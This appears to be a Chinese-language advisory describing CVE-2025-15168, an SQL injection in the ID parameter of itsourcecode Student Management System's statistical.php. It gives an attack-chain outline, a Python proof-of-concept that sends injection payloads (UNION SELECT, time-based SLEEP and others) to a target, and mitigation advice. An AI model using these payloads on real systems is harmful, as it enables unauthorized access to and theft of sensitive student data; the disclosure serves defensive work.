CVE-2025-15168: itsourcecode学生管理系统statistical.php文件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15168

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Student Management System 1.0

漏洞概述

CVE-2025-15168是itsourcecode学生管理系统1.0版本中的一个高危SQL注入漏洞。该漏洞位于/statistical.php文件中的ID参数，攻击者可以通过构造恶意的SQL语句实现未授权的数据库操作。由于漏洞利用复杂度较低且无需认证，远程攻击者可以直接利用此漏洞获取敏感数据或对数据库进行修改。学生管理系统通常存储学生个人信息、成绩数据等敏感内容，一旦被攻击可能导致大规模数据泄露。该漏洞的CVSS评分为7.3，属于高危级别，攻击向量为网络层面，无需用户交互即可实现攻击。漏洞已被公开披露，存在被恶意利用的实际风险。建议相关用户尽快采取防护措施或升级到安全版本。

技术细节

该SQL注入漏洞存在于itsourcecode学生管理系统的/statistical.php文件中，受影响的参数为ID参数。攻击者可以通过在ID参数中注入恶意的SQL代码来执行未授权的数据库操作。由于系统未对用户输入进行充分的过滤和验证，攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术从数据库中提取敏感信息，包括用户凭证、成绩数据、个人信息等。攻击者还可以通过SQL注入进行数据修改或删除，甚至在某些配置下可能实现操作系统命令执行。该漏洞的网络攻击向量（AV:N）表明攻击者可以从任何网络位置发起攻击，低复杂度（AC:L）意味着不需要特殊条件即可成功利用，且无需认证（PR:N）和用户交互（UI:N），大大增加了漏洞的可利用性。公开的利用代码使得技术能力较低的攻击者也能轻松实施攻击。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的itsourcecode学生管理系统1.0版本

STEP 2

步骤2

漏洞探测：访问/statistical.php文件，测试ID参数是否存在SQL注入漏洞

STEP 3

步骤3

Payload构造：根据目标数据库类型构造恶意的SQL注入Payload（如UNION SELECT、布尔盲注等）

STEP 4

步骤4

数据提取：通过SQL注入获取数据库中的敏感信息，如用户表、成绩数据、个人信息等

STEP 5

步骤5

权限提升：利用获取的凭据尝试进一步入侵系统或获取更高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15168 SQL Injection PoC
# Target: itsourcecode Student Management System 1.0
# File: /statistical.php
# Parameter: ID

import requests
import sys

def test_sql_injection(url, param_id):
    # Basic SQL injection test payloads
    payloads = [
        "1' OR '1'='1",
        "1' UNION SELECT 1,2,3--",
        "1' AND SLEEP(5)--",
        "1' OR 1=1 LIMIT 1--"
    ]
    
    print(f"[*] Testing SQL Injection on {url}")
    print(f"[*] Target parameter: {param_id}")
    
    for payload in payloads:
        try:
            target_url = f"{url}/statistical.php?ID={payload}"
            print(f"\n[+] Testing payload: {payload}")
            
            response = requests.get(target_url, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] Request sent successfully")
                print(f"[+] Response length: {len(response.text)} bytes")
                
                # Check for SQL error messages
                sql_errors = ['sql', 'mysql', 'syntax', 'error', 'warning']
                for error in sql_errors:
                    if error.lower() in response.text.lower():
                        print(f"[!] Potential SQL error detected: {error}")
                        
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15168.py <target_url>")
        print("Example: python cve-2025-15168.py http://target.com")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    test_sql_injection(target_url, 'ID')

影响范围

itsourcecode Student Management System 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1) 在Web应用层对ID参数进行严格的输入过滤和验证；2) 部署Web应用防火墙规则拦截可疑的SQL注入请求；3) 临时禁用/statistical.php页面或设置访问限制；4) 对数据库账户进行权限最小化配置，限制SQL查询权限；5) 加强数据库日志监控，及时发现异常查询行为。建议尽快升级到官方发布的安全版本以彻底修复该漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15168
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15168
3 Details https://www.cvedetails.com/cve/CVE-2025-15168/
4 VulDB https://vuldb.com/cve/CVE-2025-15168
5 Link https://github.com/Susen2/cve/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.338547
8 Link https://vuldb.com/?id.338547
9 Link https://vuldb.com/?submit.721155
10 Link https://github.com/Susen2/cve/issues/1